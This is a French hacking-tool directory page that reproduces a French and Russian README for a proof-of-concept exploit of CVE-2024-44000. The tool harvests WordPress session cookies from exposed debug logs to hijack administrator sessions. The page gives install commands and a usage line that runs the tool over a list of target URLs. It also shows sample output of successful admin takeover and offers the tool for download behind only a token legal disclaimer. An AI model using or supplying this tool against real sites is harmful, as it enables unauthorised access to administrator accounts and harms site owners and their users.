Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-44000 — est un outil de PoC conçu pour exploiter les journaux de débogage exposés de manière non sécurisée de sites WordPress et extraire les cookies de session. | Kitploit
Outils/GitHubGitHub/geniuszly/cve-2024-44000
ExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionRed Teaming
GitHubgeniuszly/cve-2024-44000

CVE-2024-44000

est un outil de PoC conçu pour exploiter les journaux de débogage exposés de manière non sécurisée de sites WordPress et extraire les cookies de session.

Voir le dépôt
5il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

FR

GenCookieSessionHijack est un outil PoC conçu pour exploiter les journaux de débogage exposés de manière non sécurisée sur des sites WordPress et extraire les cookies de session. Cela permet à l’attaquant de détourner des sessions administrateur actives et d’obtenir un accès non autorisé au tableau de bord d’administration WordPress.

Fonctionnalités

  • Extraction de cookies à partir des journaux de débogage WordPress.
  • Identification et filtrage des cookies de session (par exemple, wordpress_logged_in).
  • Tentative automatique de détournement de session pour un accès administrateur.
  • Ouverture de la session administrateur détournée directement dans le navigateur.

Utilisation

Installation

root@kitploit:~
git clone https://github.com/geniuszly/CVE-2024-44000
cd CVE-2024-44000
pip install -r requirements.txt

Exécution de l’outil

  1. Préparez une liste d’URL cibles WordPress dans un fichier, une par ligne (par exemple, list.txt).
  • Exécutez l’outil avec la commande suivante :
  • root@kitploit:~
    python GenCookieSessionHijack.py -f list.txt -o result.txt
    

    Paramètres

    • -f, --file : Chemin vers le fichier contenant la liste des URL (par défaut : list.txt).
    • -o, --output : Fichier pour enregistrer les résultats (par défaut : result.txt).

    Exemple

    root@kitploit:~
    python GenCookieSessionHijack.py -f targets.txt -o output.txt
    

    Cette commande lira la liste des URL depuis targets.txt, tentera d’extraire et d’utiliser les cookies de session, et enregistrera les résultats dans output.txt.

    Résultats

    Si la tentative de détournement de session réussit, l’outil générera une URL avec le cookie de session administrateur détourné et l’ouvrira directement dans le navigateur par défaut.

    Exemple de sortie :

    root@kitploit:~
    [+] Лог-файл успешно получен с http://example.com
    [+] Найдены session cookies для http://example.com:
        wordpress_logged_in_abcdef123456
    [+] Успешно захвачен сеанс администратора с cookie: wordpress_logged_in_abcdef123456
    [+] URL захваченного сеанса: http://example.com/wp-login.php?redirect_to=http://example.com/wp-admin/?wordpress_logged_in_abcdef123456
    [+] Установленный cookie: http://example.com/wp-login.php?cookie=wordpress_logged_in_abcdef123456
    
    [-] Не удалось захватить сеанс администратора с cookie: wordpress_logged_in_invalidcookie
    
    [-] Session cookies не найдены в логах для http://another-example.com
    [-] Не удалось получить лог-файл для http://another-example.com. Код ответа: 404
    
    

    Avertissement légal

    Cet outil est destiné uniquement à des fins éducatives et ne doit pas être utilisé pour des activités illégales. L’auteur n’est pas responsable de toute utilisation abusive ou de tout dommage causé par cet outil.

    RU

    GenCookieSessionHijack — это PoC скрипт, созданный для эксплуатации уязвимо раскрытых отладочных логов на сайтах WordPress с целью извлечения сессионных cookies. Это позволяет злоумышленнику перехватить активные сеансы администратора и получить несанкционированный доступ к панели администрирования WordPress.

    Особенности

    • Извлечение cookies из отладочных логов WordPress.
    • Идентификация и фильтрация сессионных cookies (например, wordpress_logged_in).
    • Автоматическая попытка захвата сеанса для доступа в админку.
    • Открытие захваченного сеанса администратора непосредственно в браузере.

    Использование

    Установка

    root@kitploit:~
    git clone https://github.com/geniuszly/CVE-2024-44000
    cd CVE-2024-44000
    pip install -r requirements.txt
    

    Запуск программы

    1. Подготовьте файл со списком целевых URL WordPress, по одному на строку (например, list.txt).
    2. Запустите программу следующей командой:
    root@kitploit:~
    python GenCookieSessionHijack.py -f list.txt -o result.txt
    

    Параметры

    • -f, --file: Путь к файлу со списком URL (по умолчанию: list.txt).
    • -o, --output: Файл для сохранения результатов (по умолчанию: result.txt).

    Пример

    root@kitploit:~
    python GenCookieSessionHijack.py -f targets.txt -o output.txt
    

    Это прочитает список URL из targets.txt, попытается извлечь и использовать сессионные cookies, и сохранит результаты в output.txt.

    Результаты

    Если попытка захвата сеанса успешна, инструмент сгенерирует URL с захваченным сессионным cookie администратора и откроет его непосредственно в браузере.

    Пример вывода:

    root@kitploit:~
    [+] Лог-файл успешно получен с http://example.com
    [+] Найдены session cookies для http://example.com:
        wordpress_logged_in_abcdef123456
    [+] Успешно захвачен сеанс администратора с cookie: wordpress_logged_in_abcdef123456
    [+] URL захваченного сеанса: http://example.com/wp-login.php?redirect_to=http://example.com/wp-admin/?wordpress_logged_in_abcdef123456
    [+] Установленный cookie: http://example.com/wp-login.php?cookie=wordpress_logged_in_abcdef123456
    
    [-] Не удалось захватить сеанс администратора с cookie: wordpress_logged_in_invalidcookie
    
    [-] Session cookies не найдены в логах для http://another-example.com
    [-] Не удалось получить лог-файл для http://another-example.com. Код ответа: 404
    
    

    Отказ от ответственности

    Этот инструмент предназначен исключительно для образовательных целей и не должен использоваться для незаконных действий. Автор не несет ответственности за любое неправомерное использование или ущерб, вызванный этим инструментом.

    Télécharger l’outil